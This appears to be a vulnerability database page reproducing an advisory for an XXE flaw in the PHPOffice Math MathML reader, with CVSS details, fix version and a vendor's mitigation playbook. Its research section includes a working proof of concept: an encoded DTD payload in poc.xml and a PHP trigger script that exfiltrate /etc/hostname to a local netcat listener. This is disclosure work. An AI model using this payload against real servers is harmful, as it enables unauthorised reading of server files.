Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐘 Packagist

GHSA-42hm-pq2f-3r7m

PHPOffice Math allows XXE when processing an XML file in the MathML format

Also known asCVE-2025-48882
Published
May 29, 2025
Updated
May 30, 2025
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.4%probability of exploitation in next 30 days
Lower Risk33th percentile+0.05%
0.00%0.31%0.61%0.92%0.1%0.4%Dec 25Apr 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
🐘phpoffice/math

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.

Description

Product: Math Version: 0.2.0 CWE-ID: CWE-611: Improper Restriction of XML External Entity Reference CVSS vector v.4.0: 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N) CVSS vector v.3.1: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) Description: An attacker can create a special XML file, during which it processed, external entities are loaded, and it’s possible to read local server files.
Impact: Local server files reading Vulnerable component: The loadXML function with the unsafe LIBXML_DTDLOAD flag, the MathML class Exploitation conditions: The vulnerability applies only to reading a file in the MathML format. Mitigation: If there is no option to refuse using the LIBXML_DTDLOAD flag, it’s recommended to filter external entities through the implementation of the custom external entity loader function. Researcher: Aleksandr Zhurnakov (Positive Technologies)

Research

Zero-day vulnerability was discovered in the Math library in the detailed process of the XXE vulnerability research in PHP. Loading XML data, using the standard libxml extension and the LIBXML_DTDLOAD flag without additional filtration, leads to XXE.

Below are steps to reproduce the vulnerability.

  1. Preparation:
  • The payload was tested on the PHP versions >= 8.1.
  • The composer manager is used to install the latest version of the Math library.
  • PHP has to be configurated with Zlib support.
  • The necessary requirements for the Math library must be installed.
  • The netcat utility is used for demonstration exfiltration.
  1. Make math directory and then moving into it.
mkdir math && cd math
  1. Install the latest actual version of the library (Figure 1).
composer require phpoffice/math

Figure 1. Installing the library <img width="630" alt="fig2" src="https://github.com/user-attachments/assets/bb0c6781-4f5a-411c-970d-9402e652ad87" />

  1. Create poc.xml file (Listing 1):

Listing 1. Creating poc.xml

xml     
<?xml version="1.0" encoding="UTF-8"?>     <!DOCTYPE x SYSTEM 
"php://filter/convert.base64-
decode/zlib.inflate/resource=data:,7Ztdb9owFIbv%2bRVZJ9armNjOZ2k7QUaL%2bRYO2nqFUn
BFNQaMptP272cnNFuTsBbSskg1iATZzvGxn/ccX3A4fdfoecS7UsrK1A98hV5Rr9FVjlaz1UmlcnM7D9i
6MlkufrB1AK79O2bqKltMllMWt96KL6ADwci7sJ4Yu0vr9/tlwKbqan27CPzrOXvevFGrbRvOGIseaCa7
TAxok1x44xahXzQEcdKPKZPevap3RZw920I0VscWGLlU1efPsy0c5cbV1AoI7ZuOMCZW12nkcP9Q2%2bQ
ObBNmL6ajg8s6xJqmJTrq5NIArX6zVk8Zcwwt4fPuLvHnbeBSvpdIQ6g93MvUv3CHqKNrmtEW4EYmCr5g
DT5QzyNWE4x6xO1/aqQmgMhGYgaVDFUnScKltbFnaJoKHRuHK0L1pIkuaYselMe9cPUqRmm5C51u00kkh
y1S3aBougkl7e4d6RGaTYeSehdCjAG/O/p%2bYfKyQsoLmgdlmsFYQFDjh6GWJyGE0ZfMX08EZtwNTdAY
ud7nLcksnwppA2UnqpCzgyDo1QadAU3vLOQZ82EHMxAi0KVcq7rzas5xD6AQoeqkYkgk02abukkJ/z%2b
Nvkj%2bjUy16Ba5d/S8anhBLwt44EgGkoFkIBlIBpKBZCAZSAaSgWQgGUgGkoFkIBlIBpKBZCAZSAaSgW
QgGUgGxWOwW2nF7kt%2by7/Kb3ag2GUTUgBvXAAxiKxt4Is3sB4WniVrOvhwzB0CXerg5GN9esGRQv7Rg
QdMmMO9sIwtc/sIJUOCsY4ee7f7FIWu2Si4euKan8wg58nFsEIXxYGntgZqMog3Z2FrgPhgyzIOlsmijo
wqwb0jyMqMoGEbarqdOpP/iqFISMkSVFG1Z5p8f3OK%2bxAZ7gClpgUPg70rq0T2RIkcup/0newQ7NbcU
Xv/DPl4LL/N7hdfn2dp07pmd8v79YSdVVgwqcyWd8HC/8aOzkunf6r%2b2c8bpSxK/6uPmlf%2br/nSny
rHcduH99iqKiz7HwLxTLMgEM0QWUDjb3ji8NdHPslZmV%2bqR%2bfH56Xyxni1VGbV0m8=" 
[]><foo></foo>
  1. Create math.php file (Listing 2):

Listing 2. Creating math.php

<?php
    require_once "./vendor/autoload.php";

    $reader = new \PhpOffice\Math\Reader\MathML();
    $reader->read(
        file_get_contents('poc.xml')
    );
  1. The payload (see the step 4) is set to exfiltrate the /etc/hostname file through http://127.0.0.1:9999/, so the listening socket is launched at the 9999 port (Figure 2)

Figure 2. Launching the listening socket <img width="550" alt="fig2" src="https://github.com/user-attachments/assets/6da5b966-70be-4e3e-9bde-c6baf4dfef34" />

  1. Execute php-script via console:
php math.php

6 characters from the /etc/hostname file will be exfiltrated to the 9999 port in base64 format (Figure 3).

Figure 3. Characters exfiltration <img width="520" alt="fig3" src="https://github.com/user-attachments/assets/f0eae873-d156-442f-ab08-12dd94a8dbe9" />

Decode the received data from base64 removing the last M character (the payload feature) (Figure 4).

Figure 4. Data decoding <img width="595" alt="fig4" src="https://github.com/user-attachments/assets/7a091a07-7856-41a0-b1bd-3d8009303ced" />

  1. By changing the payload, the remaining file can be received.

Credits

Aleksandr Zhurnakov (Positive Technologies)

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐘Packagistphpoffice/mathall versions0.3.0

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for phpoffice/math. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update phpoffice/math to 0.3.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-42hm-pq2f-3r7m is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-42hm-pq2f-3r7m is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-42hm-pq2f-3r7m. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

**Product:** Math **Version:** 0.2.0 **CWE-ID:** CWE-611: Improper Restriction of XML External Entity Reference **CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N) **CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) **Description:** An attacker can create a special XML file, during which it processed, external entities are loaded, and it’s possible to read local server files. **Impact:** Local server files reading **Vulnerable component:** The [`loadXML`](https://github.com/PHPOffice/Math/blob/c3ecbf35601e2a322bf2ddba48589d79ac827b92/src/Math/Read
O3 Security · Impact-Aware SCA

Is GHSA-42hm-pq2f-3r7m in your dependencies?

O3 detects GHSA-42hm-pq2f-3r7m across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works